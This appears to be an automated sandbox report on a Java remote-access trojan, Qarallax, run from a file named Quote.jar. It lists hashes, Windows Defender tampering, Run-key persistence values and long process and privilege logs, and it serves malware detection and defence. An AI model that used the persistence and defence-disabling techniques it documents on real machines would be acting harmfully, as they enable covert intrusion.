qarallax | e06e4d0ce2a189209e34ee24832d021418781872dae863ffa2b4126b14e17b15

Analysis

max time kernel
141s
max time network
140s
platform
windows10_x64
resource
win10
submitted
18-08-2020 19:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Quote.jar
Size

399KB
MD5

2b68744fed1c4c5c156a4247160fa8f8
SHA1

50cb830acadbe050d1cdd3cc1e8516e76a9ab30b
SHA256

e06e4d0ce2a189209e34ee24832d021418781872dae863ffa2b4126b14e17b15
SHA512

4ed06e23b899d465efc0b75a42b283a48c07eb8ae0dd1848df7a700032324a6a8d7368bb2bad5b7ccc4041b7fd2df447bc60278d65a717989f82d8fff771fe49

Score

10^/10

persistence trojan qarallax evasion

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
QarallaxRAT
Qarallax is a RAT developed by Quaverse and sold as RaaS (RAT as a Service).
trojan qarallax

Qarallax RAT support DLL 1 IoCs

resource	yara_rule
behavioral2/files/0x000100000001ae70-50.dat	qarallax_dll

Sets file execution options in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Loads dropped DLL 1 IoCs

pid	Process
3672	java.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\DEPOFJF = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\UaoPj\\SbBYi.class\""	java.exe
Key created	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run\DEPOFJF = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\UaoPj\\SbBYi.class\""	java.exe

Drops desktop.ini file(s) 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\UaoPj\Desktop.ini	java.exe
File created	C:\Users\Admin\UaoPj\Desktop.ini	java.exe
File opened for modification	C:\Users\Admin\UaoPj\Desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\UaoPj\Desktop.ini	attrib.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\vmABS	java.exe
File opened for modification	C:\Windows\System32\vmABS	java.exe

Kills process with taskkill 16 IoCs

evasion

pid	Process
5024	taskkill.exe
756	taskkill.exe
860	taskkill.exe
4968	taskkill.exe
3856	taskkill.exe
2256	taskkill.exe
4204	taskkill.exe
4712	taskkill.exe
1736	taskkill.exe
1856	taskkill.exe
2088	taskkill.exe
4920	taskkill.exe
5000	taskkill.exe
4900	taskkill.exe
4688	taskkill.exe
5000	taskkill.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
3892	powershell.exe
3892	powershell.exe
3892	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3672	java.exe

Suspicious use of AdjustPrivilegeToken 164 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	808	WMIC.exe
Token: SeSecurityPrivilege	808	WMIC.exe
Token: SeTakeOwnershipPrivilege	808	WMIC.exe
Token: SeLoadDriverPrivilege	808	WMIC.exe
Token: SeSystemProfilePrivilege	808	WMIC.exe
Token: SeSystemtimePrivilege	808	WMIC.exe
Token: SeProfSingleProcessPrivilege	808	WMIC.exe
Token: SeIncBasePriorityPrivilege	808	WMIC.exe
Token: SeCreatePagefilePrivilege	808	WMIC.exe
Token: SeBackupPrivilege	808	WMIC.exe
Token: SeRestorePrivilege	808	WMIC.exe
Token: SeShutdownPrivilege	808	WMIC.exe
Token: SeDebugPrivilege	808	WMIC.exe
Token: SeSystemEnvironmentPrivilege	808	WMIC.exe
Token: SeRemoteShutdownPrivilege	808	WMIC.exe
Token: SeUndockPrivilege	808	WMIC.exe
Token: SeManageVolumePrivilege	808	WMIC.exe
Token: 33	808	WMIC.exe
Token: 34	808	WMIC.exe
Token: 35	808	WMIC.exe
Token: 36	808	WMIC.exe
Token: SeIncreaseQuotaPrivilege	808	WMIC.exe
Token: SeSecurityPrivilege	808	WMIC.exe
Token: SeTakeOwnershipPrivilege	808	WMIC.exe
Token: SeLoadDriverPrivilege	808	WMIC.exe
Token: SeSystemProfilePrivilege	808	WMIC.exe
Token: SeSystemtimePrivilege	808	WMIC.exe
Token: SeProfSingleProcessPrivilege	808	WMIC.exe
Token: SeIncBasePriorityPrivilege	808	WMIC.exe
Token: SeCreatePagefilePrivilege	808	WMIC.exe
Token: SeBackupPrivilege	808	WMIC.exe
Token: SeRestorePrivilege	808	WMIC.exe
Token: SeShutdownPrivilege	808	WMIC.exe
Token: SeDebugPrivilege	808	WMIC.exe
Token: SeSystemEnvironmentPrivilege	808	WMIC.exe
Token: SeRemoteShutdownPrivilege	808	WMIC.exe
Token: SeUndockPrivilege	808	WMIC.exe
Token: SeManageVolumePrivilege	808	WMIC.exe
Token: 33	808	WMIC.exe
Token: 34	808	WMIC.exe
Token: 35	808	WMIC.exe
Token: 36	808	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1172	WMIC.exe
Token: SeSecurityPrivilege	1172	WMIC.exe
Token: SeTakeOwnershipPrivilege	1172	WMIC.exe
Token: SeLoadDriverPrivilege	1172	WMIC.exe
Token: SeSystemProfilePrivilege	1172	WMIC.exe
Token: SeSystemtimePrivilege	1172	WMIC.exe
Token: SeProfSingleProcessPrivilege	1172	WMIC.exe
Token: SeIncBasePriorityPrivilege	1172	WMIC.exe
Token: SeCreatePagefilePrivilege	1172	WMIC.exe
Token: SeBackupPrivilege	1172	WMIC.exe
Token: SeRestorePrivilege	1172	WMIC.exe
Token: SeShutdownPrivilege	1172	WMIC.exe
Token: SeDebugPrivilege	1172	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1172	WMIC.exe
Token: SeRemoteShutdownPrivilege	1172	WMIC.exe
Token: SeUndockPrivilege	1172	WMIC.exe
Token: SeManageVolumePrivilege	1172	WMIC.exe
Token: 33	1172	WMIC.exe
Token: 34	1172	WMIC.exe
Token: 35	1172	WMIC.exe
Token: 36	1172	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1172	WMIC.exe
Token: SeSecurityPrivilege	1172	WMIC.exe
Token: SeTakeOwnershipPrivilege	1172	WMIC.exe
Token: SeLoadDriverPrivilege	1172	WMIC.exe
Token: SeSystemProfilePrivilege	1172	WMIC.exe
Token: SeSystemtimePrivilege	1172	WMIC.exe
Token: SeProfSingleProcessPrivilege	1172	WMIC.exe
Token: SeIncBasePriorityPrivilege	1172	WMIC.exe
Token: SeCreatePagefilePrivilege	1172	WMIC.exe
Token: SeBackupPrivilege	1172	WMIC.exe
Token: SeRestorePrivilege	1172	WMIC.exe
Token: SeShutdownPrivilege	1172	WMIC.exe
Token: SeDebugPrivilege	1172	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1172	WMIC.exe
Token: SeRemoteShutdownPrivilege	1172	WMIC.exe
Token: SeUndockPrivilege	1172	WMIC.exe
Token: SeManageVolumePrivilege	1172	WMIC.exe
Token: 33	1172	WMIC.exe
Token: 34	1172	WMIC.exe
Token: 35	1172	WMIC.exe
Token: 36	1172	WMIC.exe
Token: SeDebugPrivilege	1736	taskkill.exe
Token: SeDebugPrivilege	3892	powershell.exe
Token: SeDebugPrivilege	1856	taskkill.exe
Token: SeIncreaseQuotaPrivilege	2980	WMIC.exe
Token: SeSecurityPrivilege	2980	WMIC.exe
Token: SeTakeOwnershipPrivilege	2980	WMIC.exe
Token: SeLoadDriverPrivilege	2980	WMIC.exe
Token: SeSystemProfilePrivilege	2980	WMIC.exe
Token: SeSystemtimePrivilege	2980	WMIC.exe
Token: SeProfSingleProcessPrivilege	2980	WMIC.exe
Token: SeIncBasePriorityPrivilege	2980	WMIC.exe
Token: SeCreatePagefilePrivilege	2980	WMIC.exe
Token: SeBackupPrivilege	2980	WMIC.exe
Token: SeRestorePrivilege	2980	WMIC.exe
Token: SeShutdownPrivilege	2980	WMIC.exe
Token: SeDebugPrivilege	2980	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2980	WMIC.exe
Token: SeRemoteShutdownPrivilege	2980	WMIC.exe
Token: SeUndockPrivilege	2980	WMIC.exe
Token: SeManageVolumePrivilege	2980	WMIC.exe
Token: 33	2980	WMIC.exe
Token: 34	2980	WMIC.exe
Token: 35	2980	WMIC.exe
Token: 36	2980	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2980	WMIC.exe
Token: SeSecurityPrivilege	2980	WMIC.exe
Token: SeTakeOwnershipPrivilege	2980	WMIC.exe
Token: SeLoadDriverPrivilege	2980	WMIC.exe
Token: SeSystemProfilePrivilege	2980	WMIC.exe
Token: SeSystemtimePrivilege	2980	WMIC.exe
Token: SeProfSingleProcessPrivilege	2980	WMIC.exe
Token: SeIncBasePriorityPrivilege	2980	WMIC.exe
Token: SeCreatePagefilePrivilege	2980	WMIC.exe
Token: SeBackupPrivilege	2980	WMIC.exe
Token: SeRestorePrivilege	2980	WMIC.exe
Token: SeShutdownPrivilege	2980	WMIC.exe
Token: SeDebugPrivilege	2980	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2980	WMIC.exe
Token: SeRemoteShutdownPrivilege	2980	WMIC.exe
Token: SeUndockPrivilege	2980	WMIC.exe
Token: SeManageVolumePrivilege	2980	WMIC.exe
Token: 33	2980	WMIC.exe
Token: 34	2980	WMIC.exe
Token: 35	2980	WMIC.exe
Token: 36	2980	WMIC.exe
Token: SeDebugPrivilege	2088	taskkill.exe
Token: SeDebugPrivilege	860	taskkill.exe
Token: SeIncreaseQuotaPrivilege	3892	powershell.exe
Token: SeSecurityPrivilege	3892	powershell.exe
Token: SeTakeOwnershipPrivilege	3892	powershell.exe
Token: SeLoadDriverPrivilege	3892	powershell.exe
Token: SeSystemProfilePrivilege	3892	powershell.exe
Token: SeSystemtimePrivilege	3892	powershell.exe
Token: SeProfSingleProcessPrivilege	3892	powershell.exe
Token: SeIncBasePriorityPrivilege	3892	powershell.exe
Token: SeCreatePagefilePrivilege	3892	powershell.exe
Token: SeBackupPrivilege	3892	powershell.exe
Token: SeRestorePrivilege	3892	powershell.exe
Token: SeShutdownPrivilege	3892	powershell.exe
Token: SeDebugPrivilege	3892	powershell.exe
Token: SeSystemEnvironmentPrivilege	3892	powershell.exe
Token: SeRemoteShutdownPrivilege	3892	powershell.exe
Token: SeUndockPrivilege	3892	powershell.exe
Token: SeManageVolumePrivilege	3892	powershell.exe
Token: 33	3892	powershell.exe
Token: 34	3892	powershell.exe
Token: 35	3892	powershell.exe
Token: 36	3892	powershell.exe
Token: SeDebugPrivilege	3856	taskkill.exe
Token: SeDebugPrivilege	2256	taskkill.exe
Token: SeDebugPrivilege	4688	taskkill.exe
Token: SeDebugPrivilege	5000	taskkill.exe
Token: SeDebugPrivilege	4968	taskkill.exe
Token: SeDebugPrivilege	4204	taskkill.exe
Token: SeDebugPrivilege	4712	taskkill.exe
Token: SeDebugPrivilege	4920	taskkill.exe
Token: SeDebugPrivilege	5000	taskkill.exe
Token: SeDebugPrivilege	5024	taskkill.exe
Token: SeDebugPrivilege	4900	taskkill.exe
Token: SeDebugPrivilege	756	taskkill.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3672	java.exe

Suspicious use of WriteProcessMemory 386 IoCs

description	pid	Process	procid_target
PID 3672 wrote to memory of 560	3672	java.exe	68
PID 3672 wrote to memory of 560	3672	java.exe	68
PID 3672 wrote to memory of 524	3672	java.exe	70
PID 3672 wrote to memory of 524	3672	java.exe	70
PID 524 wrote to memory of 808	524	cmd.exe	72
PID 524 wrote to memory of 808	524	cmd.exe	72
PID 3672 wrote to memory of 412	3672	java.exe	73
PID 3672 wrote to memory of 412	3672	java.exe	73
PID 412 wrote to memory of 1172	412	cmd.exe	75
PID 412 wrote to memory of 1172	412	cmd.exe	75
PID 3672 wrote to memory of 1416	3672	java.exe	76
PID 3672 wrote to memory of 1416	3672	java.exe	76
PID 3672 wrote to memory of 1580	3672	java.exe	78
PID 3672 wrote to memory of 1580	3672	java.exe	78
PID 3672 wrote to memory of 1936	3672	java.exe	80
PID 3672 wrote to memory of 1936	3672	java.exe	80
PID 3672 wrote to memory of 2052	3672	java.exe	81
PID 3672 wrote to memory of 2052	3672	java.exe	81
PID 3672 wrote to memory of 2080	3672	java.exe	83
PID 3672 wrote to memory of 2080	3672	java.exe	83
PID 3672 wrote to memory of 2140	3672	java.exe	85
PID 3672 wrote to memory of 2140	3672	java.exe	85
PID 3672 wrote to memory of 2716	3672	java.exe	87
PID 3672 wrote to memory of 2716	3672	java.exe	87
PID 3672 wrote to memory of 2824	3672	java.exe	89
PID 3672 wrote to memory of 2824	3672	java.exe	89
PID 3672 wrote to memory of 2992	3672	java.exe	92
PID 3672 wrote to memory of 2992	3672	java.exe	92
PID 3672 wrote to memory of 3892	3672	java.exe	94
PID 3672 wrote to memory of 3892	3672	java.exe	94
PID 3672 wrote to memory of 3764	3672	java.exe	95
PID 3672 wrote to memory of 3764	3672	java.exe	95
PID 3672 wrote to memory of 1736	3672	java.exe	96
PID 3672 wrote to memory of 1736	3672	java.exe	96
PID 3672 wrote to memory of 3344	3672	java.exe	97
PID 3672 wrote to memory of 3344	3672	java.exe	97
PID 3672 wrote to memory of 4064	3672	java.exe	102
PID 3672 wrote to memory of 4064	3672	java.exe	102
PID 3672 wrote to memory of 1628	3672	java.exe	103
PID 3672 wrote to memory of 1628	3672	java.exe	103
PID 3672 wrote to memory of 912	3672	java.exe	106
PID 3672 wrote to memory of 912	3672	java.exe	106
PID 3672 wrote to memory of 864	3672	java.exe	107
PID 3672 wrote to memory of 864	3672	java.exe	107
PID 3672 wrote to memory of 1700	3672	java.exe	110
PID 3672 wrote to memory of 1700	3672	java.exe	110
PID 3672 wrote to memory of 1824	3672	java.exe	111
PID 3672 wrote to memory of 1824	3672	java.exe	111
PID 3672 wrote to memory of 2100	3672	java.exe	114
PID 3672 wrote to memory of 2100	3672	java.exe	114
PID 3672 wrote to memory of 2820	3672	java.exe	116
PID 3672 wrote to memory of 2820	3672	java.exe	116
PID 3672 wrote to memory of 3360	3672	java.exe	118
PID 3672 wrote to memory of 3360	3672	java.exe	118
PID 3672 wrote to memory of 1448	3672	java.exe	120
PID 3672 wrote to memory of 1448	3672	java.exe	120
PID 2992 wrote to memory of 3876	2992	cmd.exe	121
PID 2992 wrote to memory of 3876	2992	cmd.exe	121
PID 3672 wrote to memory of 2192	3672	java.exe	123
PID 3672 wrote to memory of 2192	3672	java.exe	123
PID 3672 wrote to memory of 1228	3672	java.exe	125
PID 3672 wrote to memory of 1228	3672	java.exe	125
PID 3672 wrote to memory of 2980	3672	java.exe	127
PID 3672 wrote to memory of 2980	3672	java.exe	127
PID 3672 wrote to memory of 1856	3672	java.exe	128
PID 3672 wrote to memory of 1856	3672	java.exe	128
PID 3672 wrote to memory of 1548	3672	java.exe	131
PID 3672 wrote to memory of 1548	3672	java.exe	131
PID 3672 wrote to memory of 2148	3672	java.exe	134
PID 3672 wrote to memory of 2148	3672	java.exe	134
PID 2992 wrote to memory of 3700	2992	cmd.exe	136
PID 2992 wrote to memory of 3700	2992	cmd.exe	136
PID 3672 wrote to memory of 3740	3672	java.exe	137
PID 3672 wrote to memory of 3740	3672	java.exe	137
PID 3672 wrote to memory of 3932	3672	java.exe	139
PID 3672 wrote to memory of 3932	3672	java.exe	139
PID 3672 wrote to memory of 1812	3672	java.exe	141
PID 3672 wrote to memory of 1812	3672	java.exe	141
PID 3672 wrote to memory of 4064	3672	java.exe	143
PID 3672 wrote to memory of 4064	3672	java.exe	143
PID 4064 wrote to memory of 2196	4064	cmd.exe	145
PID 4064 wrote to memory of 2196	4064	cmd.exe	145
PID 3672 wrote to memory of 2988	3672	java.exe	146
PID 3672 wrote to memory of 2988	3672	java.exe	146
PID 2988 wrote to memory of 2980	2988	cmd.exe	148
PID 2988 wrote to memory of 2980	2988	cmd.exe	148
PID 4064 wrote to memory of 788	4064	cmd.exe	149
PID 4064 wrote to memory of 788	4064	cmd.exe	149
PID 3672 wrote to memory of 1576	3672	java.exe	150
PID 3672 wrote to memory of 1576	3672	java.exe	150
PID 3672 wrote to memory of 2088	3672	java.exe	152
PID 3672 wrote to memory of 2088	3672	java.exe	152
PID 1576 wrote to memory of 2192	1576	cmd.exe	154
PID 1576 wrote to memory of 2192	1576	cmd.exe	154
PID 1576 wrote to memory of 2884	1576	cmd.exe	155
PID 1576 wrote to memory of 2884	1576	cmd.exe	155
PID 3672 wrote to memory of 2708	3672	java.exe	156
PID 3672 wrote to memory of 2708	3672	java.exe	156
PID 2708 wrote to memory of 3160	2708	cmd.exe	158
PID 2708 wrote to memory of 3160	2708	cmd.exe	158
PID 2708 wrote to memory of 416	2708	cmd.exe	159
PID 2708 wrote to memory of 416	2708	cmd.exe	159
PID 3672 wrote to memory of 864	3672	java.exe	160
PID 3672 wrote to memory of 864	3672	java.exe	160
PID 864 wrote to memory of 3020	864	cmd.exe	162
PID 864 wrote to memory of 3020	864	cmd.exe	162
PID 3672 wrote to memory of 860	3672	java.exe	163
PID 3672 wrote to memory of 860	3672	java.exe	163
PID 864 wrote to memory of 912	864	cmd.exe	165
PID 864 wrote to memory of 912	864	cmd.exe	165
PID 3672 wrote to memory of 3396	3672	java.exe	166
PID 3672 wrote to memory of 3396	3672	java.exe	166
PID 3396 wrote to memory of 2148	3396	cmd.exe	168
PID 3396 wrote to memory of 2148	3396	cmd.exe	168
PID 3396 wrote to memory of 3528	3396	cmd.exe	169
PID 3396 wrote to memory of 3528	3396	cmd.exe	169
PID 3672 wrote to memory of 3468	3672	java.exe	170
PID 3672 wrote to memory of 3468	3672	java.exe	170
PID 3468 wrote to memory of 1804	3468	cmd.exe	172
PID 3468 wrote to memory of 1804	3468	cmd.exe	172
PID 3468 wrote to memory of 1224	3468	cmd.exe	173
PID 3468 wrote to memory of 1224	3468	cmd.exe	173
PID 3672 wrote to memory of 3388	3672	java.exe	174
PID 3672 wrote to memory of 3388	3672	java.exe	174
PID 3388 wrote to memory of 3024	3388	cmd.exe	177
PID 3388 wrote to memory of 3024	3388	cmd.exe	177
PID 3388 wrote to memory of 860	3388	cmd.exe	178
PID 3388 wrote to memory of 860	3388	cmd.exe	178
PID 3672 wrote to memory of 980	3672	java.exe	179
PID 3672 wrote to memory of 980	3672	java.exe	179
PID 980 wrote to memory of 3808	980	cmd.exe	181
PID 980 wrote to memory of 3808	980	cmd.exe	181
PID 980 wrote to memory of 1224	980	cmd.exe	182
PID 980 wrote to memory of 1224	980	cmd.exe	182
PID 3672 wrote to memory of 1452	3672	java.exe	183
PID 3672 wrote to memory of 1452	3672	java.exe	183
PID 1452 wrote to memory of 1804	1452	cmd.exe	185
PID 1452 wrote to memory of 1804	1452	cmd.exe	185
PID 1452 wrote to memory of 3808	1452	cmd.exe	186
PID 1452 wrote to memory of 3808	1452	cmd.exe	186
PID 3672 wrote to memory of 1864	3672	java.exe	187
PID 3672 wrote to memory of 1864	3672	java.exe	187
PID 1864 wrote to memory of 3536	1864	cmd.exe	189
PID 1864 wrote to memory of 3536	1864	cmd.exe	189
PID 1864 wrote to memory of 3876	1864	cmd.exe	190
PID 1864 wrote to memory of 3876	1864	cmd.exe	190
PID 3672 wrote to memory of 2808	3672	java.exe	191
PID 3672 wrote to memory of 2808	3672	java.exe	191
PID 3672 wrote to memory of 3856	3672	java.exe	192
PID 3672 wrote to memory of 3856	3672	java.exe	192
PID 2808 wrote to memory of 3436	2808	cmd.exe	195
PID 2808 wrote to memory of 3436	2808	cmd.exe	195
PID 2808 wrote to memory of 1548	2808	cmd.exe	196
PID 2808 wrote to memory of 1548	2808	cmd.exe	196
PID 3672 wrote to memory of 2980	3672	java.exe	197
PID 3672 wrote to memory of 2980	3672	java.exe	197
PID 2980 wrote to memory of 3772	2980	cmd.exe	199
PID 2980 wrote to memory of 3772	2980	cmd.exe	199
PID 2980 wrote to memory of 2132	2980	cmd.exe	200
PID 2980 wrote to memory of 2132	2980	cmd.exe	200
PID 3672 wrote to memory of 3360	3672	java.exe	201
PID 3672 wrote to memory of 3360	3672	java.exe	201
PID 3360 wrote to memory of 3852	3360	cmd.exe	203
PID 3360 wrote to memory of 3852	3360	cmd.exe	203
PID 3360 wrote to memory of 1028	3360	cmd.exe	204
PID 3360 wrote to memory of 1028	3360	cmd.exe	204
PID 3672 wrote to memory of 1804	3672	java.exe	205
PID 3672 wrote to memory of 1804	3672	java.exe	205
PID 1804 wrote to memory of 3420	1804	cmd.exe	207
PID 1804 wrote to memory of 3420	1804	cmd.exe	207
PID 1804 wrote to memory of 3304	1804	cmd.exe	208
PID 1804 wrote to memory of 3304	1804	cmd.exe	208
PID 3672 wrote to memory of 2256	3672	java.exe	209
PID 3672 wrote to memory of 2256	3672	java.exe	209
PID 3672 wrote to memory of 3808	3672	java.exe	211
PID 3672 wrote to memory of 3808	3672	java.exe	211
PID 3808 wrote to memory of 1708	3808	cmd.exe	213
PID 3808 wrote to memory of 1708	3808	cmd.exe	213
PID 3808 wrote to memory of 4116	3808	cmd.exe	214
PID 3808 wrote to memory of 4116	3808	cmd.exe	214
PID 3672 wrote to memory of 4136	3672	java.exe	215
PID 3672 wrote to memory of 4136	3672	java.exe	215
PID 4136 wrote to memory of 4172	4136	cmd.exe	217
PID 4136 wrote to memory of 4172	4136	cmd.exe	217
PID 4136 wrote to memory of 4192	4136	cmd.exe	218
PID 4136 wrote to memory of 4192	4136	cmd.exe	218
PID 3672 wrote to memory of 4212	3672	java.exe	219
PID 3672 wrote to memory of 4212	3672	java.exe	219
PID 4212 wrote to memory of 4248	4212	cmd.exe	221
PID 4212 wrote to memory of 4248	4212	cmd.exe	221
PID 4212 wrote to memory of 4268	4212	cmd.exe	222
PID 4212 wrote to memory of 4268	4212	cmd.exe	222
PID 3672 wrote to memory of 4288	3672	java.exe	223
PID 3672 wrote to memory of 4288	3672	java.exe	223
PID 4288 wrote to memory of 4324	4288	cmd.exe	225
PID 4288 wrote to memory of 4324	4288	cmd.exe	225
PID 4288 wrote to memory of 4344	4288	cmd.exe	226
PID 4288 wrote to memory of 4344	4288	cmd.exe	226
PID 3672 wrote to memory of 4364	3672	java.exe	227
PID 3672 wrote to memory of 4364	3672	java.exe	227
PID 4364 wrote to memory of 4400	4364	cmd.exe	229
PID 4364 wrote to memory of 4400	4364	cmd.exe	229
PID 4364 wrote to memory of 4420	4364	cmd.exe	230
PID 4364 wrote to memory of 4420	4364	cmd.exe	230
PID 3672 wrote to memory of 4444	3672	java.exe	231
PID 3672 wrote to memory of 4444	3672	java.exe	231
PID 4444 wrote to memory of 4480	4444	cmd.exe	233
PID 4444 wrote to memory of 4480	4444	cmd.exe	233
PID 4444 wrote to memory of 4500	4444	cmd.exe	234
PID 4444 wrote to memory of 4500	4444	cmd.exe	234
PID 3672 wrote to memory of 4520	3672	java.exe	235
PID 3672 wrote to memory of 4520	3672	java.exe	235
PID 4520 wrote to memory of 4556	4520	cmd.exe	237
PID 4520 wrote to memory of 4556	4520	cmd.exe	237
PID 4520 wrote to memory of 4576	4520	cmd.exe	238
PID 4520 wrote to memory of 4576	4520	cmd.exe	238
PID 3672 wrote to memory of 4596	3672	java.exe	239
PID 3672 wrote to memory of 4596	3672	java.exe	239
PID 4596 wrote to memory of 4636	4596	cmd.exe	241
PID 4596 wrote to memory of 4636	4596	cmd.exe	241
PID 4596 wrote to memory of 4656	4596	cmd.exe	242
PID 4596 wrote to memory of 4656	4596	cmd.exe	242
PID 3672 wrote to memory of 4676	3672	java.exe	243
PID 3672 wrote to memory of 4676	3672	java.exe	243
PID 3672 wrote to memory of 4688	3672	java.exe	244
PID 3672 wrote to memory of 4688	3672	java.exe	244
PID 4676 wrote to memory of 4752	4676	cmd.exe	247
PID 4676 wrote to memory of 4752	4676	cmd.exe	247
PID 4676 wrote to memory of 4780	4676	cmd.exe	248
PID 4676 wrote to memory of 4780	4676	cmd.exe	248
PID 3672 wrote to memory of 4808	3672	java.exe	249
PID 3672 wrote to memory of 4808	3672	java.exe	249
PID 4808 wrote to memory of 4844	4808	cmd.exe	251
PID 4808 wrote to memory of 4844	4808	cmd.exe	251
PID 4808 wrote to memory of 4864	4808	cmd.exe	252
PID 4808 wrote to memory of 4864	4808	cmd.exe	252
PID 3672 wrote to memory of 4884	3672	java.exe	253
PID 3672 wrote to memory of 4884	3672	java.exe	253
PID 4884 wrote to memory of 4920	4884	cmd.exe	255
PID 4884 wrote to memory of 4920	4884	cmd.exe	255
PID 4884 wrote to memory of 4940	4884	cmd.exe	256
PID 4884 wrote to memory of 4940	4884	cmd.exe	256
PID 3672 wrote to memory of 4960	3672	java.exe	257
PID 3672 wrote to memory of 4960	3672	java.exe	257
PID 4960 wrote to memory of 4996	4960	cmd.exe	259
PID 4960 wrote to memory of 4996	4960	cmd.exe	259
PID 4960 wrote to memory of 5016	4960	cmd.exe	260
PID 4960 wrote to memory of 5016	4960	cmd.exe	260
PID 3672 wrote to memory of 5036	3672	java.exe	261
PID 3672 wrote to memory of 5036	3672	java.exe	261
PID 5036 wrote to memory of 5072	5036	cmd.exe	263
PID 5036 wrote to memory of 5072	5036	cmd.exe	263
PID 5036 wrote to memory of 5092	5036	cmd.exe	264
PID 5036 wrote to memory of 5092	5036	cmd.exe	264
PID 3672 wrote to memory of 5112	3672	java.exe	265
PID 3672 wrote to memory of 5112	3672	java.exe	265
PID 5112 wrote to memory of 3772	5112	cmd.exe	267
PID 5112 wrote to memory of 3772	5112	cmd.exe	267
PID 5112 wrote to memory of 3436	5112	cmd.exe	268
PID 5112 wrote to memory of 3436	5112	cmd.exe	268
PID 3672 wrote to memory of 4120	3672	java.exe	269
PID 3672 wrote to memory of 4120	3672	java.exe	269
PID 4120 wrote to memory of 4176	4120	cmd.exe	271
PID 4120 wrote to memory of 4176	4120	cmd.exe	271
PID 4120 wrote to memory of 4196	4120	cmd.exe	272
PID 4120 wrote to memory of 4196	4120	cmd.exe	272
PID 3672 wrote to memory of 4228	3672	java.exe	273
PID 3672 wrote to memory of 4228	3672	java.exe	273
PID 4228 wrote to memory of 4280	4228	cmd.exe	275
PID 4228 wrote to memory of 4280	4228	cmd.exe	275
PID 4228 wrote to memory of 4328	4228	cmd.exe	276
PID 4228 wrote to memory of 4328	4228	cmd.exe	276
PID 3672 wrote to memory of 4348	3672	java.exe	277
PID 3672 wrote to memory of 4348	3672	java.exe	277
PID 4348 wrote to memory of 4412	4348	cmd.exe	279
PID 4348 wrote to memory of 4412	4348	cmd.exe	279
PID 4348 wrote to memory of 4432	4348	cmd.exe	280
PID 4348 wrote to memory of 4432	4348	cmd.exe	280
PID 3672 wrote to memory of 4488	3672	java.exe	281
PID 3672 wrote to memory of 4488	3672	java.exe	281
PID 4488 wrote to memory of 4500	4488	cmd.exe	283
PID 4488 wrote to memory of 4500	4488	cmd.exe	283
PID 4488 wrote to memory of 4572	4488	cmd.exe	284
PID 4488 wrote to memory of 4572	4488	cmd.exe	284
PID 3672 wrote to memory of 4592	3672	java.exe	285
PID 3672 wrote to memory of 4592	3672	java.exe	285
PID 4592 wrote to memory of 4640	4592	cmd.exe	287
PID 4592 wrote to memory of 4640	4592	cmd.exe	287
PID 4592 wrote to memory of 4668	4592	cmd.exe	288
PID 4592 wrote to memory of 4668	4592	cmd.exe	288
PID 3672 wrote to memory of 4696	3672	java.exe	289
PID 3672 wrote to memory of 4696	3672	java.exe	289
PID 4696 wrote to memory of 4780	4696	cmd.exe	291
PID 4696 wrote to memory of 4780	4696	cmd.exe	291
PID 4696 wrote to memory of 4776	4696	cmd.exe	292
PID 4696 wrote to memory of 4776	4696	cmd.exe	292
PID 3672 wrote to memory of 4728	3672	java.exe	293
PID 3672 wrote to memory of 4728	3672	java.exe	293
PID 4728 wrote to memory of 4856	4728	cmd.exe	295
PID 4728 wrote to memory of 4856	4728	cmd.exe	295
PID 4728 wrote to memory of 4876	4728	cmd.exe	296
PID 4728 wrote to memory of 4876	4728	cmd.exe	296
PID 3672 wrote to memory of 4924	3672	java.exe	297
PID 3672 wrote to memory of 4924	3672	java.exe	297
PID 4924 wrote to memory of 4968	4924	cmd.exe	299
PID 4924 wrote to memory of 4968	4924	cmd.exe	299
PID 3672 wrote to memory of 5000	3672	java.exe	300
PID 3672 wrote to memory of 5000	3672	java.exe	300
PID 4924 wrote to memory of 5044	4924	cmd.exe	302
PID 4924 wrote to memory of 5044	4924	cmd.exe	302
PID 3672 wrote to memory of 5072	3672	java.exe	303
PID 3672 wrote to memory of 5072	3672	java.exe	303
PID 5072 wrote to memory of 3588	5072	cmd.exe	305
PID 5072 wrote to memory of 3588	5072	cmd.exe	305
PID 5072 wrote to memory of 4184	5072	cmd.exe	306
PID 5072 wrote to memory of 4184	5072	cmd.exe	306
PID 3672 wrote to memory of 4176	3672	java.exe	307
PID 3672 wrote to memory of 4176	3672	java.exe	307
PID 4176 wrote to memory of 4332	4176	cmd.exe	309
PID 4176 wrote to memory of 4332	4176	cmd.exe	309
PID 4176 wrote to memory of 4324	4176	cmd.exe	310
PID 4176 wrote to memory of 4324	4176	cmd.exe	310
PID 3672 wrote to memory of 4400	3672	java.exe	311
PID 3672 wrote to memory of 4400	3672	java.exe	311
